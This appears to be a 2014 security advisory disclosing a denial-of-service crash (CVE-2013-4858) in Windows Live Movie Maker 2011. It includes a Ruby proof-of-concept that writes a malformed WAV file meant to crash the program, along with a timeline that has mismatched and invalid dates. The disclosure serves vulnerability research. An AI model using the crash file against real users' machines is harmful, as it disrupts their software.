Microsoft Windows Live Movie Maker WAV File Handling DoS Weakness

1. Advisory Information

Title: Microsoft Windows Live Movie Maker WAV File Handling DoS Weakness
Advisory URL: https://osandamalith.wordpress.com/2014/01/10/microsoft-windows-live-movie-maker-wav-file-handling-dos-weakness/
Date published: 2014-10-10
Vendors contacted: Microsoft
Release mode: User release

2. Vulnerability Information

Class: Integer division by zero
Impact: Denial of Service (DoS)
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: 2013-4858

3. Summary

Microsoft Windows Live Movie maker is a inbuilt application in Windows 7 systems. It is used in simple scale video editing purposes.

4. Vulnerability Description

Microsoft Windows Live Movie Maker contains a flaw that may allow for a denial of service. The issue is triggered when a user opens a malformed WAV file, resulting in a loss of availability for the program. This can be exploited remotely by tricking a user into opening the crafted file (e.g., via email), or locally by placing it in a location that may seem safe (e.g., a network share).

5. Vulnerable Packages

  • Version 2011 (Build 15.4.53508.1109)

6. Credits

This bug was researched by Osanda Malith Jayathissa.

7. Proof of Concept

#!/usr/bin/env ruby
#Title: Windows Live Movie Maker 2011 (.wav) DoS Local Exploit
#Version: Version 2011 (Build 15.4.53508.1109)
#Tested on: Windows 7 Professional 32-bit SP1
#E-Mail: OsandaJayathissa@gmail.com
#Exploit-Author: Osanda Malith Jayathissa
#Video: https://www.youtube.com/watch?v=SBJYzSNdY6k
# /!\ Auhor is not responsible for any damage you cause
# Use this material for educational purposes only
#This is just a simple crash not an exploitable bug
#Twitter: @OsandaMalith
#Date: 25 Decemeber 2013
#CVE: 2013-4858
begin
  dos =(
  "\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"+
    "\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"+
    "\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"+
    "\x40\x4f\x73\x61\x6e\x64\x61\x4d\x61\x6c\x69\x74\x68\x00\x00\x00"+
    "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x74\x41\x41\x41\x41\x41\x41"+
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
    "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
    "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
    "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
    "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41")

  file = open("WindowsMovieMaker.wav","w")
  file.write(dos)
  file.close()

  puts "[+] Exploit created >> WindowsMovieMaker.wav"
  puts "[*] Open any image and Click add music and add our payload"
  puts "[~] by Osanda Malith"
end
#EOF


8. Report Timeline

2013-10-16: The researcher notifies the vendor Microsoft.
2013-20-16: Confirms that is only a crash and not a exploitable bug.
2014-01-10: Public disclosure.

9.  Disclaimer 

The information contained within this advisory is supplied “as-is” with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.

10. References

[1] http://packetstormsecurity.com/files/124596/Windows-Live-Movie-Maker-2011-Denial-Of-Service.html

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s